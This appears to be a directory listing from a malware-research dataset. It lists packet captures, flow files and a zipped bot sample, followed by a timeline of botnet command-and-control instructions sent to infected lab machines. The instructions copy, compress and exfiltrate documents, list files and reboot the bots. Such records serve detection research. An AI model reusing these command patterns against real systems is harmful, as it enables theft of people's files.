![]() | Name | Last modified | Size | Description |
---|---|---|---|---|
![]() | Parent Directory | - | ||
![]() | bro/ | 2017-08-31 09:45 | - | |
![]() | 2013-06-08_capture1.capinfos | 2015-10-05 17:26 | 723 | |
![]() | 2013-06-08_capture1.tcpdstat | 2016-12-05 22:28 | 2.2K | |
![]() | README.md | 2015-10-06 11:25 | 4.6K | |
![]() | README.html | 2017-01-14 17:09 | 6.5K | |
![]() | timeline.of.commands.txt | 2015-10-05 20:22 | 9.5K | |
![]() | 2013-06-08_capture1.dnstop | 2015-10-05 17:21 | 18K | |
![]() | 2013-06-08_capture1.passivedns | 2015-10-05 17:21 | 19K | |
![]() | flufollower-bot.exe.zip | 2015-12-16 10:26 | 21K | |
![]() | fast-flux-dga-first-analysis.txt | 2017-01-14 17:09 | 48K | |
![]() | 2013-06-08_capture1.weblogng | 2016-06-15 18:48 | 148M | |
![]() | 2013-06-08_capture1.biargus | 2015-10-05 17:32 | 195M | |
![]() | 2013-06-08_capture1.binetflow | 2015-10-05 17:32 | 207M | |
![]() | 2013-06-08_capture1.pcap | 2015-10-05 20:46 | 1.4G | |
We did several SSH connections to openshift for management purposes. They are not part of the infection.
Start of the capture - During the first day, we only did the infection and the C&C connections.
Changed the proxy to squid/3.3.7, because the other one was not allowing us to exfiltrate
Command 30958 sent.
Some copy of documents to a local folder
<instruction type="cp" argumento="C:\Users\Administrator\Documents\*.ppt C:\test\" id_unico_comando="24205" maquina="administrator_0800272508E5"/>
Compression of documents
<instruction type="Rar.exe" argumento="a C:\A1234567890.rar C:\Users\Administrator\Documents\*.pdf" id_unico_comando="8544" maquina="administrator_0800273C8DC9"/>
Exfiltration of documents
<instruction type="getfile" argumento="C:\A1234567890.rar" id_unico_comando="30596" maquina="administrator_0800272508E5"/>
More exfiltration of documents
<instruction type="getfile" argumento="C:\A001.rar" id_unico_comando="9501" maquina="administrator_0800272508E5"/>
Command 27269 sent.
<instruction type="snapshot" argumento="" id_unico_comando="27269" maquina="all"/>
Command to compress documents
<instruction type="Rar.exe" argumento="a C:\A123.rar C:\Users\Administrator\Documents\*.docx" id_unico_comando="277" maquina="administrator_0800273C8DC9"/>
Exfiltraion of documents
<instruction type="getfile" argumento="C:\A123.rar" id_unico_comando="2054" maquina="administrator_0800273C8DC9"/>
Command to shutdown one bot
<instruction type="shutdown" argumento="-r " id_unico_comando="20258" maquina="administrator_08002785477E"/>
Command to shutdown other bot
<instruction type="shutdown" argumento="-r" id_unico_comando="14756" maquina="administrator_0800273C8DC9"/>
Command to list files in all bots
<instruction type="listfiles" argumento="" id_unico_comando="25144" maquina="all"/>
Capture finished